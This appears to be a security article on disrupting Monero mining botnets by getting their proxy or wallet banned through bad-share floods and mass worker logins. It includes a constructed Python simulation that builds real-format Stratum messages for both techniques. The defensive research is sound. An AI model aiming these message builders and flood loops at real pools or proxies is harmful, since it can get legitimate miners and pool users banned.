Strategic Disruption of Cryptomining Campaigns Utilizing Malicious Share Techniques and XMRogue Insights
Cybersecurity researchers have identified two innovative techniques that can effectively disrupt cryptocurrency mining botnets. These methods exploit the inherent design of prevalent mining topologies, aiming to halt the mining process entirely.
By leveraging these mining topologies and pool policies, the research team has developed strategies that significantly reduce a cryptominer botnet’s effectiveness, potentially forcing attackers to overhaul their infrastructure or abandon their campaigns altogether.
The first technique, referred to as “bad shares,” gets the attacker’s mining proxy banned by the upstream pool. Once the proxy is cut off, every miner behind it stops receiving work, and CPU usage on the victim hosts drops from 100% to 0%. The proxy is the weak point precisely because of what it does for the attacker: it sits between the infected hosts and the pool so that the pool address and wallet never appear on the victims, but it also funnels every miner’s shares to the pool from a single source, so a ban on that source takes down the whole botnet at once.
In practice, the defender connects to the attacker’s proxy as if it were just another miner and repeatedly submits invalid job results, known as bad shares. The proxy does not validate them and forwards them upstream; once enough bad shares accumulate, the pool bans the proxy, which disrupts mining for the entire botnet.
To implement this, the researchers built an in-house tool named XMRogue that impersonates a miner, connects to a mining proxy, and keeps submitting bad shares until the proxy is banned.
The second approach covers the case where victim miners connect directly to a public pool with no proxy in between. Here the lever is a pool policy: if more than 1,000 workers are logged in using the attacker’s wallet at the same time, the pool temporarily bans that wallet address for one hour. The ban is reversible, and the account recovers once the extra login connections cease, so the disruption lasts only as long as the defender keeps those connections open.
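The following script is an added illustration of both techniques at the Stratum message level; it is not XMRogue or any code from the researchers. It builds the newline-delimited JSON-RPC messages that XMRig-style Monero miners exchange with a proxy or pool (login, job, submit), and runs them against an in-memory pool and proxy so it can be executed offline. The pool models the two policies the text relies on: a source that keeps submitting invalid shares is banned (the tolerance of five is an assumed value), and a wallet with more than 1,000 concurrent workers is banned for one hour (the policy quoted above). The share check, IP addresses, wallet and worker names are all constructed for the example.

```python
"""Constructed model of the bad-share and login-flood disruptions (not XMRogue)."""
import json
import os

INVALID_SHARE_LIMIT = 5          # assumed: pool bans a source IP after this many bad shares
MAX_WORKERS_PER_WALLET = 1000    # from the text: more than this triggers a wallet ban
WALLET_BAN_SECONDS = 3600        # from the text: the ban lasts one hour
JOB_DIFFICULTY = 100_000         # assumed job difficulty for the simulated pool


def login_message(rpc_id, wallet, worker):
    """Stratum 'login' as XMRig-style miners send it (worker name rides in 'pass')."""
    return json.dumps({"id": rpc_id, "jsonrpc": "2.0", "method": "login",
                       "params": {"login": wallet, "pass": worker, "agent": "xmrig/6.21.0"}})


def bad_share_message(rpc_id, session_id, job_id):
    """A 'submit' whose result can never meet the target: a bad share.

    The pool compares the little-endian uint64 in bytes 24..32 of the hash
    against the job target; forcing the top byte to 0xff guarantees rejection.
    """
    return json.dumps({"id": rpc_id, "jsonrpc": "2.0", "method": "submit",
                       "params": {"id": session_id, "job_id": job_id,
                                  "nonce": os.urandom(4).hex(),
                                  "result": os.urandom(31).hex() + "ff"}})


class SimulatedPool:
    """Accepts Stratum lines from a source IP and applies the two pool policies."""

    def __init__(self):
        self.now = 0                                     # simulated clock in seconds
        self.target = (2 ** 64 - 1) // JOB_DIFFICULTY    # Monero-style 64-bit target
        self.banned_ips, self.invalid_by_ip = set(), {}
        self.workers_by_wallet, self.wallet_ban_until = {}, {}

    @staticmethod
    def _error(rpc_id, message):
        return json.dumps({"id": rpc_id, "jsonrpc": "2.0",
                           "error": {"code": -1, "message": message}})

    def handle(self, src_ip, line):
        """Return the pool's reply line, or None when the connection is dropped."""
        if src_ip in self.banned_ips:
            return None
        msg = json.loads(line)
        params = msg.get("params", {})
        if msg.get("method") == "login":
            wallet = params["login"]
            if self.wallet_ban_until.get(wallet, -1) > self.now:
                return self._error(msg["id"], "Wallet temporarily banned")
            workers = self.workers_by_wallet.setdefault(wallet, set())
            workers.add(params.get("pass", "x"))
            if len(workers) > MAX_WORKERS_PER_WALLET:      # second technique's trigger
                self.wallet_ban_until[wallet] = self.now + WALLET_BAN_SECONDS
                workers.clear()
                return self._error(msg["id"], "Too many workers")
            job = {"job_id": os.urandom(4).hex(), "blob": "00" * 76, "algo": "rx/0",
                   "target": self.target.to_bytes(8, "little").hex()}
            return json.dumps({"id": msg["id"], "jsonrpc": "2.0", "error": None,
                               "result": {"id": os.urandom(8).hex(), "job": job, "status": "OK"}})
        if msg.get("method") == "submit":
            # A real pool recomputes the hash from blob+nonce; here the submitted
            # result stands in for that hash and is checked against the target.
            share = int.from_bytes(bytes.fromhex(params["result"])[24:], "little")
            if share < self.target:
                return json.dumps({"id": msg["id"], "jsonrpc": "2.0", "error": None,
                                   "result": {"status": "OK"}})
            self.invalid_by_ip[src_ip] = self.invalid_by_ip.get(src_ip, 0) + 1
            if self.invalid_by_ip[src_ip] >= INVALID_SHARE_LIMIT:   # first technique's trigger
                self.banned_ips.add(src_ip)
                return None
            return self._error(msg["id"], "Low difficulty share")
        return self._error(msg["id"], "Unknown method")


class SimulatedProxy:
    """Forwards every miner's lines to the pool from one IP without validating shares."""

    def __init__(self, pool, proxy_ip="203.0.113.10"):
        self.pool, self.proxy_ip = pool, proxy_ip

    def handle(self, line):
        return self.pool.handle(self.proxy_ip, line)


def bad_share_attack(proxy, wallet="attacker-wallet", max_shares=1000):
    """Technique 1: log in through the proxy and submit bad shares until it is cut off.

    Returns the number of shares it took, or None if the proxy was never banned.
    """
    result = json.loads(proxy.handle(login_message(1, wallet, "xmrogue-like")))["result"]
    session_id, job_id = result["id"], result["job"]["job_id"]
    for sent in range(1, max_shares + 1):
        if proxy.handle(bad_share_message(sent + 1, session_id, job_id)) is None:
            return sent
    return None


def login_flood(pool, wallet, count):
    """Technique 2: log in directly to the pool as `count` distinct workers on one wallet.

    Returns the login number that triggered the wallet ban, or None if none did.
    """
    for i in range(count):
        reply = pool.handle(f"198.51.100.{i % 250}", login_message(1, wallet, f"w{i}"))
        if json.loads(reply)["error"]:
            return i + 1
    return None


def wallet_is_banned(pool, wallet):
    """True when a fresh victim login on `wallet` is refused by the pool."""
    return json.loads(pool.handle("192.0.2.1", login_message(1, wallet, "victim-host")))["error"] is not None
```

Running `bad_share_attack` against `SimulatedProxy(SimulatedPool())` gets the proxy's IP banned after the fifth bad share, after which a victim miner's login through the same proxy gets no reply at all, which is the CPU-to-0% effect described above. `login_flood` with 1,001 workers bans the wallet on the 1,001st login; advancing `pool.now` by `WALLET_BAN_SECONDS` lets the wallet log in again, which is the reversibility the text notes.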
While these strategies were developed against Monero miners, they extend to other cryptocurrencies as well. They show how defenders can disrupt malicious cryptomining campaigns by turning pool policies against the attacker, without harming legitimate pool operations.
A legitimate miner hit by either method recovers quickly, since it only has to change its IP address or wallet details. A botnet operator has a much harder time: every infected host must be reconfigured to point at a new proxy or wallet. For less sophisticated operators, these measures can incapacitate the botnet entirely.